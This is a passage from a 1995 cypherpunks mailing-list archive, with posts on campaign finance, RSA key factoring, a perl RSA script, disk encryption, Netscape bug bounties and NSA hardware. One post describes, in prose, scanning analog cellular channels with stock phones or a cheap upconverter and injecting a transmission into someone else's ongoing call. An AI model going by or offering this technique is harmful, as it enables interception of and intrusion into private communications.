>      alt, rec, etc.. newsgroups...is there another way to access these 
>      groups?

1) Firewalls don't block newsgroups.
2) This has nothing to do with cryptography. 

.pm




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Tue, 19 Dec 1995 02:33:52 +0800
To: Brian Davis <bdavis@thepoint.net>
Subject: Re: Political Cleanup program
Message-ID: <2.2b8.32.19951218161154.0069e694@panix.com>
MIME-Version: 1.0
Content-Type: text/plain


At 10:35 AM 12/18/95 -0500, Brian Davis wrote:

>> A better solution is to move assets and money into forms where
>> politicians cannot get at them, thus reducing the power of politicians,
>> and thus the incentive to buy favors from them.
>
>I'm not sure what you mean here:  are politicians to be prohibited from 
>campaigning (which cost money)?  And if politicians, who generally take 
>the form of human beings, can't get at $$$, how can you or I?

Brian, the above means cut the power and the purse of politicians so they
have nothing to sell to contributors so no contributors will buy.

DCF 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: hallam@w3.org
Date: Tue, 19 Dec 1995 05:03:22 +0800
To: jim bell <cypherpunks@toad.com
Subject: Re: Political Cleanup program
In-Reply-To: <m0tRWN2-0008yUC@pacifier.com>
Message-ID: <9512181620.AA10316@zorch.w3.org>
MIME-Version: 1.0
Content-Type: text/plain



The main problem with anonymous political donations is that it is easy enough to 
create linkage if the recipient and the donor conspire together. 

There are many other things that campaign laws are intended to achieve beyond 
avoiding bribery. For example foreign nationals cannot make donations to US 
parties. It would be a good thing if there were similar laws in the UK since at 
the last election a foreign national with links to organised crime alledghedly 
made a multi million donation to the Conservative party. Of course in the 
absence of full disclosure of details of party records nobody can be sure. We 
are as voters entitled to consider the worst however.

Similarly it would be bad if a politician could obtain huge sums of money simply 
by espousing causes backed by lartge sums of cash. A candidate that proposed 
making large federal donnations to the arms industry (codeword "Strong defence") 
might expect substantially more donations than one who proposed a reversal of 
this policy. Similarly candidates supporting private prisons might expect funds 
from the likely beneficiaries and so on.

The starting point for campaign reform has to be to cap the amount that can be 
spent on a campaign. Most countries have such laws to prevent the political 
process from being owned by the rich. Unfortunately this has happened in the US 
with the effect that both parties are much further to the right than in any 
other Western democracy. 


	Phill







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Tue, 19 Dec 1995 04:15:02 +0800
To: cypherpunks@toad.com
Subject: Re: What ever happened to... Cray Comp/NSA co-development
Message-ID: <acfaecb9000210043d3c@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 5:50 AM 12/18/95, Jim Gillogly wrote:
>Correction of one detail:
>
>> tcmay@got.net (Timothy C. May) writes:
>> When you've done this, and concluded that RSA-129 could be done in, say, X
>> minutes, then move on to RSA-384 (the BlackNet key cracked by the MIT
>> group), and on to the 1024- and 2048-bit keys. Tell us how many years or
>> centuries it will take. (Hint: Rivest and Schneier have done these
>
>The BlackNet key break didn't have any MIT involvement: it was done by
>Paul Leyland of Oxford, Arjen Lenstra of Bellcore, Alec Muffet of Sun UK,
>and Jim Gillogly of Cypherpunks, RAND, and Gillogly Software in no
>particular order.
>

Sorry, Jim. I thought that Derek Atkins was involved, which led to thinking
it was MIT. Now that you've reminded me, some of the details are beginning
to come back. (I knew that someone from our list was involved....)

--Tim May

Views here are not the views of my Internet Service Provider or Government.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Tue, 19 Dec 1995 13:19:02 +0800
To: Brian Davis <bdavis@thepoint.net>
Subject: Re: Campaign Finance Reform
Message-ID: <m0tRlB4-0008zxC@pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 10:41 AM 12/18/95 -0500, you wrote:
>On Mon, 18 Dec 1995, Jon Lasser wrote:
>
>> On Sun, 17 Dec 1995, jim bell wrote:
>...
>> > It is absolutely true that you couldn't stop a person from communicating
>> > claims of a donation to a politician.   But what you COULD do is to ensure
>> > that the donor couldn't PROVE that he made such a donation.  In other
words,
>> > _I_ could claim that I gave $1K to Senator Sludgepump (a lie) and the good
>> > senator would have no idea that I wasn't telling the truth.  The people who
>> > REALLY made such donations would be helpless.
>> 
>> A tricky way around this, if it's done ALMOST properly, is to donate in 
>> odd amounts... ie "Senator Sludgepump, I am going to donate $469.23 to 
>> your campaign..."
>> 
>> All this means is that the donations would have to be lumped in some way 
>> so that Senator Sludgepump can't find out the exact amounts donated by 
>> any individual.
>
>Cancelled checks.
>
>Or, hand check in addressed, stamped envelope to Senator Sludgepump and 
>ask him if he would mind sealing it and dropping it in a mailbox.
>
All of which raises numerous opportunities for sting operations against
politicians, done by individuals by procedures provided for under law.
Escrow (Okay, I know that's a dirty word around here, but...) an encrypted
statement of how you intend to run the sting, to be opened by the escrow
agent at some point in the future, explaining who you're going after and
how.  Make the contribution, keep evidence, and if you're successfull the
congressman goes to jail for a few years.  





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: aba@atlas.ex.ac.uk
Date: Mon, 18 Dec 1995 20:15:09 +0800
To: rick@muskoka.net
Subject: Re: BIO-MUNITION: gifs of perl-RSA tattoo
In-Reply-To: <Pine.BSD/.3.91.951217221057.9112A-100000@segwun.muskoka.net>
Message-ID: <14204.9512181148@exe.dcs.exeter.ac.uk>
MIME-Version: 1.0
Content-Type: text/plain



Richard Sheffar <rick@net.muskoka> writes on cpunks:
> Okay, I admit it I don't know everything.
> What does the perl script actually do.

It does RSA encrypt/decrypt, works with keys up to 1024 bits (and
larger).

> I saved to file, chmod 777 perly
> tried running the script and kept getting error line 3.

You need two utils installed on your machine: perl and dc.  Not having
dc would cause an error on line 3.  Try getting gnu dc (bc-1.03.tar.gz
from gnu sites, see:

	http://www.dcs.ex.ac.uk/~aba/rsa/dc.html
)

> What does it do, does it encrypt a file or what. What Have i done wrong?

To encrypt:

	rsa -k=11 -n=ca1 < plaintext > ciphertext
	
to decrypt:

	rsa -d -k=ac1 -n=ca1 < ciphertext > out

you can extract pgp keys to use with it, that was a 32 bit key for
demonstrational purposes and offers no security.  See:

	http://www.dcs.ex.ac.uk/~aba/rsa/pgpacket.html

for extracting pgp keys in hex format.

Adam





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: andr0id@midwest.net
Date: Tue, 19 Dec 1995 06:56:47 +0800
To: cypherpunks@toad.com
Subject: Re: ADDRESS DATABASE?
Message-ID: <199512181805.MAA11175@cdale1.midwest.net>
MIME-Version: 1.0
Content-Type: text/plain



>I'm not familiar with this aspect - how do cellular services store and
>make use of billing information, as opposed to traditional phone services?
>
Most cellular systems still write billing tapes and send them to a clearing
house for proccessing.  It may take 2 or 3 days before a bill is updated.
Thats not including that it takes sometimes up to a month before your
roaming charges are recorded from all of the other cellular carriers.  Some
carriers have realtime billing but it still doesn't take into account roaming.

>>  If
>> cellular customers start getting sales calls from a company that received a
>> list from a cellular carrier, the cellular carrier is obligated to refund
>> the customers bill for those calls if the customer complains becuase the
>> customer pays for calls comming or going.
>
>Is this obligation incurred by the contract between the customer and the
>cellular service, by statute, or otherwise? Contracts can always be
>broken, and passing laws to guard the guardians generally amounts to
>having the fox guard the henhouse...
>
This obligation is uncurred mostly by the fact that cellular carriers HATE
to loose customers.  If refunding a few min. of air-time helps keep a
customer then they will.  Unlike the phone company, a threat to discontinue
service with a cellular carrier works well in getting your way.

                        Dr0id





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: andr0id@midwest.net
Date: Tue, 19 Dec 1995 02:54:13 +0800
To: cypherpunks@toad.com
Subject: Re: Motorola Secure Phone
Message-ID: <199512181805.MAA11178@cdale1.midwest.net>
MIME-Version: 1.0
Content-Type: text/plain



>That just refers to the fact that it is no longer legal to sell
>scanners that can listen in to that range. 

I havn't seen any scanners that block the 900 MHz range.  Didn't think they
were blocking that.  There isn't any reason to. After all they don't block
the 49 MHz.

>(BTW, a couple of years ago Nuts & Volts ran
>an article with information on a program and some toys that let
>a laptop computer, properly wired into a cell phone, act as a
>cell scanner.  Never did wire it up, but it looked like fun ;)
>
Most cellular phone like the Motorola and the NEC can scan cellular
channels.  Whats neat is that they require little or no modification.
They can scan through all cellular channels including control, pause on a
channel that has audio, and should signal level.  

I've use the Novatel and Motorola phones to even force the transmit on my
phone on a channel that was already in conversation and create a three way
call.  Since the cellular system already proccessed the original MIN and ESN
of the calling party my ESN is never checked.  All of this without modifying
my phone internaly or adding a computer.  

This type of stuff makes encryption needed.  More and more people are using
PCMCIA cellular modems for all kinds of transaction not realizing that
anyone can pretty much intercept and use that information.  Digital will
help in some ways but harm on others.

$49 bucks will buy you an upconverter that will enable any scanner that can
pick up the 400 MHz range to pickup cellular.

                                Dr0id





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Derek Atkins <warlord@MIT.EDU>
Date: Tue, 19 Dec 1995 06:14:48 +0800
To: jim@acm.org
Subject: Re: What ever happened to... Cray Comp/NSA co-development
In-Reply-To: <199512180550.VAA13167@mycroft.rand.org>
Message-ID: <199512181815.NAA15202@toxicwaste.media.mit.edu>
MIME-Version: 1.0
Content-Type: text/plain


Correction of another detail:

> > tcmay@got.net (Timothy C. May) writes:
> > When you've done this, and concluded that RSA-129 could be done in, say, X
> > minutes, then move on to RSA-384 (the BlackNet key cracked by the MIT
> > group), and on to the 1024- and 2048-bit keys. Tell us how many years or
> > centuries it will take. (Hint: Rivest and Schneier have done these

RSA-129 is 129 decimal digits, not 129 bits.  This computes to about
425 bits, which is actually more difficult than the 384-bit Blacknet
key.

-derek




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rah@shipwright.com (Robert Hettinga)
Date: Tue, 19 Dec 1995 05:07:25 +0800
To: cypherpunks@toad.com
Subject: Fwd: Results of Internet Protest
Message-ID: <v02120d02acfb616a7bdd@[199.0.65.105]>
MIME-Version: 1.0
Content-Type: text/plain



--- begin forwarded text

Date: Mon, 18 Dec 1995 11:16:31 -0500
Subject: Fwd: Results of Internet Protest
From: Joel Bowers <jmba@bluefin.net>
Mime-Version: 1.0
Apparently-To: <rah@shipwright.com>

Subject:     Results of Internet Protest
Sent:        12/18  2:06 AM
Received:    12/18  8:18 AM
From:        mcnmembers@macn.com
To:          MCNMembers@macn.com

From:   mcnmembers@macn.com (MCN Members)
Sender: jfried@desktopdesign.com (John Friedlander)
To:     MCNMembers@macn.com (MCN Members)
========================================================================
     CAMPAIGN TO STOP THE NET CENSORSHIP LEGISLATION IN CONGRESS

     THE NET ROCKS AMERICA'S CAPITOL - NEARLY 20,000 PARTICIPANTS
                    THURSDAY DECEMBER 14, 1995

            SENATE CONFEREES COULD STILL VOTE THIS WEEK
        RALLIES HAPPENING IN AUSTIN, NEW YORK, SF, & SEATTLE

      PLEASE WIDELY REDISTRIBUTE THIS DOCUMENT WITH THIS BANNER INTACT
                REDISTRIBUTE ONLY UNTIL December 25, 1995
________________________________________________________________________

RECAP: INTERNET DAY OF PROTEST:  TUESDAY DECEMBER 12, 1995

The net came into its own as a political force on Tuesday.  The
press release has more details.  If you haven't taken a moment to
call, fax, or email, do so now.  We're still keeping track and only
need a few more to break 20,000.

VTW had someone onhand in DC monitoring the response at the Congressional
offices.  The feedback was amazing; Congress got the message.  We need to
sustain that by continuing to tell them we're not happy with the options
being offered to us at this time.

Directions for calling Congress can still be found at http://www.vtw.org/
and the many other sites listed at the end of this message.  Take a moment
to call!  Don't forget to mail us a note at protest@vtw.org to let us
know you took part in the Day Of Protest (and Day 2, and Day 3, and Day
4).


FOR IMMEDIATE RELEASE                             December 13, 1995
                                            Contact:  Steven Cherry
                                                     (718) 596-2851
                                                        stc@vtw.org
                                                     Shabbir Safdar
                                                     (718) 596-2851
                                                    shabbir@vtw.org

New York, NY

Are 20,000 phone calls a lot? 30,000? 50,000? They are if you're one of a
handful of Congressional staffers trying to field them. Tuesday, December
12th was the Internet's Day of Protest. A variety of net-activists and
telecommunications-related services exhorted the on-line community to call
a selected group of Senators and Representatives to declare their
opposition to the threat of Internet censorship. And call they did.

As the Senate members of the Telecommunications Reform conference
committee contemplated portions of legislation that would censor
"indecent" material on-line, their staffers were being overwhelmed with
phone calls. Senator Inouye's office said they were "getting lots and lots
of calls and faxes." Senator Lott's said they were "flooded with calls."
At Senator Stevens' office there were so many calls they couldn't keep
a complete tally.

At Senator Exon's office, the fax machine was "backed up."  And at one
point, activists couldn't even get through to Senator Gorton's office to
ask. Exon is the Senator whose Communications Decency Act started the
nearly year-long struggle between those who would create special
regulations to restrict speech on-line (even, in certain instances,
private email between two individuals) to a greater extent than even
traditional broadcast media; regulations that, according to the ACLU and
many other civil liberties groups, will certainly be proven to be
unconstitutional if passed into law.

"We've never seen anything like it," said Stanton McCandish of the
Electronic Frontier Foundation (EFF). The EFF is one member of the on-line
coalition that has been fighting an array of censorship legislation since
this spring, when Senator Exon introduced his Communications Decency Act.

"We may have almost overwhelmed our provider," said Shabbir Safdar, head
of Voter's Telecommunications Watch (VTW). VTW is the organization that
organized the on-line coalition. Their on-line connectivity is provided by
Panix.com, a New York-area Internet service provider. "Panix has been
doing some maintenance work today, so it's hard to tell," Safdar
continued. "But we think it's actually made a dent in their connection
to the rest of the Net."

How many calls were actually made? No one can tell. For Leslie Miller, a
reporter for USA Today, it took much of the afternoon to get some counts
from Congressional staffers, and she couldn't get any report from the
Senate's Sergeant-At-Arms, the office nominally responsible for the
Senate's telephone system. VTW may be the only organization that can
really make an educated guess.

"In our Alerts we ask that people drop us an email note after they call,"
explained VTW board member Steven Cherry. "The message count peaked in the
late afternoon at over 70 per minute. Many of those were from people who
called several offices. By 7:30 P.M. (EST) we had gotten 14,000 messages.
By Wednesday morning the count was over 18,000. And of course there are
the people who called but didn't send us email. So all told, our very
rough guess is there were well over 50,000 phone calls and faxes made on
the one day."

"The Net is coming of age, politically," said Jerry Berman, Director of
the Center for Democracy and Technology (CDT), another member of the
on-line coalition. Safdar, of VTW, concurred, saying, "I think Washington
got the message today that there's a new grass-roots interest group
around, and we're going to be a big part of the 1996 elections." (VTW's
initial election activities can be found at http://www.vtw.org/pledge.)

In addition to the Day of Protest, rallies are scheduled on Thursday,
December 14th, in San Francisco and Seattle, and a protest will be held
that day at 2:00 in New York City.

The New York rally will be at the Cyber-Cafe, 273A Lafayette St from 2-3pm
on Thursday, Dec 14th.  Contact Steven Cherry or Shabbir J. Safdar for
details.

The Austin rally is planned for Tue. Dec 19th.  No more information is
available at this time.

Information about the San Francisco rally can be obtained from
http://www.hotwired.com/staff/digaman/.

Information about the Seattle rally can be obtained from
http://www.wnia.org/WNIA/hap/rally.html.

Voters Telecommunications Watch is a volunteer organization, concentrating
on legislation as it relates to telecommunications and civil liberties.
VTW publishes a weekly BillWatch that tracks relevant legislation as it
progresses through Congress. It publishes periodic Alerts to inform the
about immediate action it can take to protect its on-line civil liberties
and privacy.

More information about VTW can be found on-line at

  gopher -p 1/vtw gopher.panix.com
  www: http://www.vtw.org

or by writing to vtw@vtw.org. The press can call (718) 596-2851 or
contact:

   Shabbir Safdar         Steven Cherry
   shabbir@vtw.org        stc@vtw.org

________________________________________________________________________
WHERE CAN I LEARN MORE?

At this moment, there are several organizations with WWW sites that now
have, or will have, information about the net censorship legislation and
the National Day Of Protest:

American Civil Liberties Union (ftp://ftp.aclu.org/aclu/)
Center for Democracy and Technology (http://www.cdt.org/)
Electronic Frontier Foundation (http://www.eff.org/)
Electronic Privacy Information Center (http://www.epic.org/)
Wired Magazine (http://www.hotwired.com/special/indecent/)
Voters Telecommunications Watch (http://www.vtw.org/ or finger
vtw@panix.com)

________________________________________________________________________
        End Alert
========================================================================



----------------------- Headers --------------------------------

_________________________  Joel M Bowers & Assoc [jmba@jmba.com]
Multiuser Database Design [MCN,ASPN & Claris Solutions Alliance]
_________________________    Voice 603-778-7494 Fax 603-778-7484
_________________________15 Curtis Road, Hampton Falls, NH 03844


--- end forwarded text


-----------------
Robert Hettinga (rah@shipwright.com)
e$, 44 Farquhar Street, Boston, MA 02131 USA (617) 958-3971
"Reality is not optional." --Thomas Sowell
The NEW(!) e$ Home Page: http://thumper.vmeng.com/pub/rah/
>>>>Phree Phil: Email: zldf@clark.net  http://www.netresponse.com/zldf <<<<<






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bryce <wilcoxb@taussky.cs.colorado.edu>
Date: Tue, 19 Dec 1995 05:43:58 +0800
To: Jiri Baum <jirib@cs.monash.edu.au>
Subject: Re: my idea of the ideal encryption tool for the masses
In-Reply-To: <199512170710.SAA17896@molly.cs.monash.edu.au>
Message-ID: <199512182100.OAA06654@taussky.cs.colorado.edu>
MIME-Version: 1.0
Content-Type: text/plain



-----BEGIN PGP SIGNED MESSAGE-----

 Jiri Baum <jirib@cs.monash.edu.au> wrote in private e-mail:
>
> Apart from that, this kind of thing has been proposed before,
> and (for payment at least) I've read a paper somewhere that
> uses something like this to get off-line anon. e-cash with
> multi-party mistrust. (Ie nobody trusts anybody.)


Yes, even such klooges such as Mondex might be considered a 
variation on my idea.  Ultimately, though, I expect this device 
to become my *only* interface with the Net.  I don't own any 
long-term storage device.  Instead I just rent it over the Net 
and encrypt any long-term data that I consider private.  I do 
any *sensitive* processing on the CPU in my handheld computer, 
but if it's a big job and I don't mind people watching then 
I rent a CPU over the Net to chew on it.


This device is perfectly portable and can be plugged into any 
Net jack in an office or telephone booth, or perhaps it can do 
wireless.  The important point is that no matter where I am 
physically, or what long-term storage device I am using via the 
Net, I have complete crypto security.  (Mod Tempest-
surveillance, physical subversion of my crypto box, etc.)  If it 
were done right I could use this same box for my notepad, wallet, 
e-mail agent, Web browser, game-player, etc. etc. etc.


> (But that requires the bank to trust tamper-proof h/w; if you
> give up anon, as you have, you don't need that because it only
> need resist until Joe can revoke his key - easily enough done
> because the shop needs to have a list of valid ones anyway.
> Alternatively you can keep anon but make clearing on-line, 
> which results in what is usually called a digital wallet.)


Hm.  As often happens in these kinds of discussions, we've 
missed each other because of different semantic conventions or 
something.  My idea does not depend upon tamper-proof hardware 
in the sense that the owner must be prevented from cracking it 
open, but it *does* (as does every conceivable crypto system) 
depend on tamper-prevention in the sense that those antagonistic 
to the owner must be prevented from cracking open his box!


Also I haven't given up anonymity at all.  Oh!  You mean in my
example of Joe paying at the grocery store.  Well he can have a
pseudonymous account at that store if he wants.  There is 
certainly no *necessity* to give up self-identity-control in any 
way.


> > It only does this in response to some kind of
> > authentication-action from Joe himself.  Perhaps he
> > inputs a 4-digit PIN.  (It should be designed so that
> ...
> 
> Fingerprint scan?


I thought about that but I personally wouldn't trust it.  It 
might fail to recognize my fingerprint at an important moment.  
Besides, I hate the thought of a mugger taking my index finger 
also when he takes my wallet...


Regards,

Bryce

signatures follow


      "To strive, to seek, to find and not to yield."  -Tennyson
            <a href="http://www.c2.org/~bryce/Niche.html">

                          bryce@colorado.edu                </a>



-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Auto-signed under Unix with 'BAP' Easy-PGP v1.01

iQCVAwUBMNXSW/WZSllhfG25AQEF4AP9GKHbSh5RgROKFclm/fgkpI+FcZjagTo9
SBa7Kdn9sFczdk23u6mHbKufDKFJO5oyri5MOPvU2QZwa9iP3zGjaBKcS6QbSOJ2
c4W71cFVJ+YZw8nnsMGwNmdISl2T0VYjQo/za4D2blZMRGDLdHgcl/E3FfTXxn5K
vBEUglr59Gs=
=ksB+
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mitton Ken <mittonk@ucsu.colorado.edu>
Date: Tue, 19 Dec 1995 06:23:36 +0800
To: cypherpunks@toad.com
Subject: Re: redirect of newsgroups
Message-ID: <199512182116.OAA21364@ucsu.colorado.edu>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Might be able to if you had admin-level access to the newsserver, but if 
there's a firewall between you and the nearest uncensored newsserver,
I doubt that's the case... had the same problem on my school machine.
Ended up just getting an account on another machine.

	--Ken Mitton
	mittonk@colorado.edu
	http://ucsu.colorado.edu/~mittonk/
	PGP KeyID: BAB3CF0D

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQBVAwUBMNXZ7Wzuqz+6s88NAQHrwQIA0bHF+6yxLHPcFIdODJhTH7Mq4+vKxho+
Jq4xOBn+yB8KY0mhPFUKQx43xmULt44AB2Jeo1cEt9FTRAFSIvua3A==
=mTvu
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Brian Davis <bdavis@thepoint.net>
Date: Tue, 19 Dec 1995 07:21:58 +0800
To: jim bell <jimbell@pacifier.com>
Subject: Re: Campaign Finance Reform
In-Reply-To: <m0tRlB4-0008zxC@pacifier.com>
Message-ID: <Pine.BSF.3.91.951218145215.16623C-100000@mercury.thepoint.net>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 18 Dec 1995, jim bell wrote:

> At 10:41 AM 12/18/95 -0500, you wrote:
> >On Mon, 18 Dec 1995, Jon Lasser wrote:
> >
> >> On Sun, 17 Dec 1995, jim bell wrote:
> >...
> >> > It is absolutely true that you couldn't stop a person from communicating
> >> > claims of a donation to a politician.   But what you COULD do is to ensure
> >> > that the donor couldn't PROVE that he made such a donation.  In other
> words,
> >> > _I_ could claim that I gave $1K to Senator Sludgepump (a lie) and the good
> >> > senator would have no idea that I wasn't telling the truth.  The people who
> >> > REALLY made such donations would be helpless.
> >> 
> >> A tricky way around this, if it's done ALMOST properly, is to donate in 
> >> odd amounts... ie "Senator Sludgepump, I am going to donate $469.23 to 
> >> your campaign..."
> >> 
> >> All this means is that the donations would have to be lumped in some way 
> >> so that Senator Sludgepump can't find out the exact amounts donated by 
> >> any individual.
> >
> >Cancelled checks.
> >
> >Or, hand check in addressed, stamped envelope to Senator Sludgepump and 
> >ask him if he would mind sealing it and dropping it in a mailbox.
> >
> All of which raises numerous opportunities for sting operations against
> politicians, done by individuals by procedures provided for under law.
> Escrow (Okay, I know that's a dirty word around here, but...) an encrypted
> statement of how you intend to run the sting, to be opened by the escrow
> agent at some point in the future, explaining who you're going after and
> how.  Make the contribution, keep evidence, and if you're successfull the
> congressman goes to jail for a few years.  


The problem with the private investigation is that law enforcement may 
not believe you were an "innocent" citizen conducting an investigation.  
Remember the ABSCAM Congressman who contended he was conducting his own 
investigation ...

Escrowing what you intend to do could be seen as blackmail ammunition if 
the Congressman fails to produce.

Unfortunately for the Cryptoanarchists (tm -- in more ways than one), 
absent law enforcement running the "sting" you are taking a risk of being 
stung yourself.

EBD




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Mark M." <markm@voicenet.com>
Date: Tue, 19 Dec 1995 05:43:09 +0800
To: cypherpunks@toad.com
Subject: Re: Securing the end-points
In-Reply-To: <608235518.31497752@BayNetworks.com>
Message-ID: <Pine.LNX.3.91.951218153917.98A-100000@localhost>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

On 18 Dec 1995, Glen McBride wrote:
 
> Greetings!
> I was wondering if in addition to all the work and discussion regarding
> crypto which generally centres around the transmission path information takes
> traveling from end-point to end-point, there is any work being done to secure
> the end-points themselves (I.e. files on your PC etc.)
> 
> In my view the end-points present the most vulnerability in the overall
> message path from person to person. It is at these points that the
> message/information exists as cleartext even if for a short period of time.
> While of course it is possible to PGP encode your files is this a practical
> way to go about securing your system? I am aware or RSA secure but is that
> all there is out there?
> 
> Thanks in advance
> 
> Glen McBride
> Bay Networks ASIA-PAC customer service
> Australia
> 

The best way to secure the endpoints of communication is to use a sector level
encryption TSR like SecureDrive.  In a program like this, when a file is
opened for reading or writing, the TSR automatically en/decrypts the data
before it is processed by the calling application.  Aside from a slightly
slower disk access rate, a program like this is not inconvenient to use at all.
SecureDrive is available at ftp://ftp.csua.berkeley.edu/pub/cypherpunks/
filesystems/secdr13c.zip.


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMNXTIrZc+sv5siulAQHCEQQAoe+4m0mbN9vjQwsO3cDbC/f/HQv5wlv5
TMRIsyYZ7JdYbFqoBIJyHCvKrVu+D41MsOJBZYpdOvd6pn9sQZA8jf2MaSFFnV7O
MgeupyvG3/gvHYFCobFWYfpDzjHHJt57CxxVHb8q3q+pJs2uF0fDTtWUxvBjk4ym
cJgsC3sc1jo=
=x6Ca
-----END PGP SIGNATURE-----


finger markm@voicenet.com for Public Key http://www.voicenet.com/~markm/
Key-ID: 0xF9B22BA5 Fingerprint: bd24d08e3cbb53472054fa56002258d5
-----BEGIN GEEK CODE BLOCK-----
Version: 3.1
GAT d- s:- a? C++++ U+++>$ P+++ L++(+++) E--- W++(--) N+++ o- K
w--- O- M- V-- PS+++>$ PE-(++) Y++ PGP+(++) t-@ 5? X++ R-- tv+
b+++ DI+ D++ G+++ e! h* r! y?
------END GEEK CODE BLOCK------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Date: Tue, 19 Dec 1995 13:20:21 +0800
To: vznuri@netcom.com
Subject: Re: Political Cleanup program
Message-ID: <01HYYIT21PW88Y51HJ@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


From: "Vladimir Z. Nuri" <vznuri@netcom.com>

>there seem to be a lot of people who suggest that merely because politics
involves money, it is therefore corrupt. this is an awfully vague and
nebulous line of thinking in my view. are we to suppose that any industry
that involves money (all of them, of course) inevitably moves in 
the direction of corruption? perhaps some more "cynicalpunks" may have 
this view, but I don't share it.
---------------------------------
	I am admittedly uncertain whether to reply to this, but... one thing
about capitalism is that money serves as a reward. Attempts to remove this
(such as in the Soviet Union) have resulted in people no longer being motivated
by things like bonuses. In other words, if we can remove the government from
having influence on the markets, then politics by money is not really a
problem. It's just another motivation for people to get more money.
	-Allen




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Date: Tue, 19 Dec 1995 06:44:51 +0800
To: tcmay@got.net
Subject: Re: What ever happened to... Cray Comp/NSA co-development
Message-ID: <01HYYJ27WNYQ8Y51HJ@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


From: tcmay@got.net (Timothy C. May)

>First, half a million chips is not that big a deal...the Connection Machine
had up to 64,000. Very few cryptographic problems of interest to us will be
affected by a mere factor of a million or so.
--------------------
	While the cryptographic stuff isn't much of a problem, how about text
analysis of multiple sources, possibly via a neural net simulation (which IIRC
a massively parallel machine is nice for)?
	-Allen




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: iagoldbe@calum.csclub.uwaterloo.ca (Ian Goldberg)
Date: Tue, 19 Dec 1995 06:51:41 +0800
To: cypherpunks@toad.com
Subject: Re: PAY-OFF TIME FOR BUG-BUSTERS, NETSCAPE PLEDGES "DOGFIGHT"
In-Reply-To: <199512151800.KAA11304@jobe.shell.portal.com>
Message-ID: <4b4nnc$b57@calum.csclub.uwaterloo.ca>
MIME-Version: 1.0
Content-Type: text/plain


In article <199512151800.KAA11304@jobe.shell.portal.com>,
 <anonymous-remailer@shell.portal.com> wrote:
>On Mon, 11 Dec 1995, Michael Coates wrote:
>
>> PAY-OFF TIME FOR BUG-BUSTERS, NETSCAPE PLEDGES "DOGFIGHT"
>> Netscape Communications has awarded two software sleuths $1,000 each for
>> finding security gaps in its Netscape Navigator 2.0 software.  The company
>> also awarded gifts to 50 other contestants in its "Bugs Bounty" program for
>> identifying non-security problems.  (Wall Street Journal 11 Dec 95 B7)
>
>Can anyone tell me whether Ian Goldberg and David Wagner got their $25,000
>from Netscape for finding the HUGE security flaws in Netscape's existing 
>product line??
>
>I can't remember whether they got anything or not ...

That would be no (well, except for the nifty T-shirt from Sameer; Thanks!).

   - Ian "There's a reason people talk about `starving grad students'..."




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anon-remailer@utopia.hacktic.nl (Anonymous)
Date: Tue, 19 Dec 1995 07:37:15 +0800
To: cypherpunks@toad.com
Subject: Re: What ever happened to... Cray Comp/NSA co-development
Message-ID: <199512182241.RAA01276@bb.hks.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

At 09:15 PM 12/17/95 -0500, Thaddeus J. Beier wrote:
> ----------
> ... about the fate and capabilities of the CCC PIM
> (processor-in-memory) machine.  A friend of mine was
> working on it, and it would have been a screaming machine,
> no doubt about it.  He said that the Cray mostly acted like
> a really fast network for the processor chips.

I had thought that it may have been similar to an Active Memory
design, but had no real clues to go by. Wasn't sure about the
chip array path width either, but thought that 1 bit was probably
the way to go given the array size.

> ... the PIM chips were made by a dedicated NSA company,
> Supercomputer Research Center, in Bowie MD.

Hmm... is that the name?

> But, it was nowhere near finished when the company finally went
> down, and the team was completely disbanded.  My friend was talking
> about going to the auction when the parts of the various machines
> were going to be sold, I don't know if he did so.  He suspected that
> the various pieces would end up going back east to the Fort
> Meade area.  Still, it is such an odd machine that you would
> probably have to transfer the staff to finish it, and that didn't
> happen.

Sorry Thad... but NOTHING 'just disappears' at the NSA...

> In any case, while it was fast (1/2 million 1-bit processors,
> perhaps as low as 1 nanosecond (1 GHz) cycle time), it was not fast
> enough to brute force reasonably strong ciphers.  It's really no joke
> that it would take a computer with picosecond clocks the size of the > earth more than the age of the universe to brute force IDEA, for
